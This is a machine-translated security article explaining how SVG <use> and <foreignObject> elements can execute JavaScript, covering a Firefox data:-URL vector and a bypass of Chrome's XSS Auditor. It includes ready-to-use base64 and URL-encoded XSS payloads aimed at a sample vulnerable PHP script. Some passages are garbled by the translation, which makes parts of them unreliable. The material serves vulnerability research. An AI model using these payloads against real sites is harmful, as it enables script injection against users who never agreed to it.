Attackers can use SVG to bypass browser XSS auditing.

[Translated From]: http://insert-script.blogspot.com/2014/02/svg-fun-time-firefox-svg-vector.html

================================== SVG-<use> element ================ the <use> element in SVG is used to reuse other elements, it is mainly used to connect <defs> and alike, but we use it to reference element elements in the external SVG file to be referenced through its id. In the xlink of the <use> tag: the href attribute starts with the '#' Well character. The reference of an external element is also in the following basic structure: test.html

<svg><use xlink:href='external.svg#rectangle' /></svg>external.svg:<svg id="rectangle" xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a xlink:href="javascript：alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>

The sxternal. svg file starts with the <svg> label, whose id is set to rectangle (rectangle), and uses the <rect> label to draw a rectangle. You can use the <a> wrap <rect> label to create a hyperlink. Using the url protocol of Javascript, you can click the hyperlink to execute Javascript after clicking. Although SVG is loaded through the <use> label, Javascript will be executed.

Note that it can only load SVG files and must meet the same-source policy.

==================================== FIREFOX ================= =====

Because the external SVG file to be loaded must be of the same source, this feature does not seem to work as a useful XSS attack vector, but Firefox will help us increase this attack vector first, you can use the data: url protocol, it allows us to create an internal file in our busy schedule. It requires the correct mime-type, which is image/svg + xml here. Mimie-type is followed by our attack load or keyword base64.

In particular, because the data is base64 encoded, this helps avoid the problem of breaking through the HTML structure. Now we no longer have to rely on another file on the server: test.html:

<svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0KGxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC9zdmc+#rectangle" /></svg>

Base64 load after decoding:

<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a xlink:href="javascript：alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>

The browser will display a black rectangle, and its location will pop up when it clicks. but why bother the victim to click? They never do what they should do :) external. the <script> label in svg is not parsed, but SVG supports the <foreignObject> element to elaborate the extended attributes required by this object, it is possible to load non-SVG elements, which means that <iframe>, <embed>, and all other supported HTML elements are now available, we can select and execute Javascript from the heap elements. Here we use the <embed> + JavascriptURL protocol to see the following SVG:

<svg id="rectangle"xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"> <script>alert(1)</script> <foreignObject width="100" height="50"requiredExtensions="http://www.w3.org/1999/xhtml"> <embed xmlns="http://www.w3.org/1999/xhtml" src="javascript：alert(location)" /> </foreignObject></svg>

It loads embedded labels through <foreignObject>,
Use the JavascriptURL protocol to execute Javascript and then encode the load with base64,
Using data: the Protocol test.html

<svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" /></svg>

In this case, test.html is opened with Firefox27, and location will pop up: in this case, we have another vector in SVG that can execute Javascript. In addition, the attack load contains a <script> alert (1) </script>, this proves that the <script> tag will not be parsed ======================== chrome xss Auditor Bypass ==== ======================== now we use this feature to deal with Chrome, chrome does not support the data: URL protocol in the <use> label xlink: href attribute. In addition, no Javascript Execution method is found without user interaction, but at least in the context of right user interaction, you can Bypass Blink/Webkit XSS Auditor. Parameter contamination is not required here. One parameter is enough. Blink/Webkit XSS Audito cannot capture and split the parameter into two or more XS. S attack to see this php script (xss. php): <? Phpecho "<body>"; echo $ _ GET ['X']; echo "</body>";?> This script has an XSS vulnerability, but using the following load will trigger XSS Auditor: http://site.com/xss.php? X = <svg> <a xlink: href = "javascript: alert (location) "> <rect x =" 0 "y =" 0 "width =" 100 "height =" 100 "/> </a> </svg> therefore, let's use the <use> element ====================== Creating theSVG on the fly ====== ======================== we want to load another SVG file, so we started with <svg> <use xlink: href =, but wait a moment, it must meet the same source. We cannot use the data pseudo protocol. How can we get files on the server? It's easy. We use the XSS vulnerability twice in a row! First, we construct a URL to create an SVG that contains a Javascript URL as a pseudo-protocol.

http://site.com/xss.php?x=<svg id="rectangle" xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a xlink:href="javascript：alert(location)"><rect class="blue" x="0" y="0" width="100" height="100" /></a></svg>

 

If you paste the entire URL into a browser without XSS Filter, a black rectangle will appear immediately. But as mentioned above, Chrome's XSS Auditor will capture this attack. Let's continue: now we need to use the created SVG file in the <use> element, create a URL like this:

http://site.com/xss.php?x=<svg><use height=200 width=200xlink:href='http://vulnerabledomain.com/xss.php?x=<svg id="rectangle"xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a xlink:href="javascript：alert(location)"><rect class="blue" x="0" y="0" width="100" height="100"/></a></svg>#rectangle'/></svg>

 

Do not forget to perform URL encoding:

http://site.com/xss.php?x=%3Csvg%3E%3Cuse%20height=200%20width=200%20xlink:href=%27http://site.com/xss.php?x=%3Csvg%20id%3D%22rectangle%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20%20%20%20width%3D%22100%22%20height%3D%22100%22%3E%3Ca%20xlink%3Ahref%3D%22javascript%3Aalert%28location%29%22%3E%3Crect%20class%3D%22blue%22%20x%3D%220%22%20y%3D%220%22%20width%3D%22100%22%20height%3D%22100%22%20%2F%3E%3C%2Fa%3E%3C%2Fsvg%3E%23rectangle%27/%3E%3C/svg%3E

 

This will display the rectangle, and click it to execute alert, but this time does not trigger XSS Auditor :)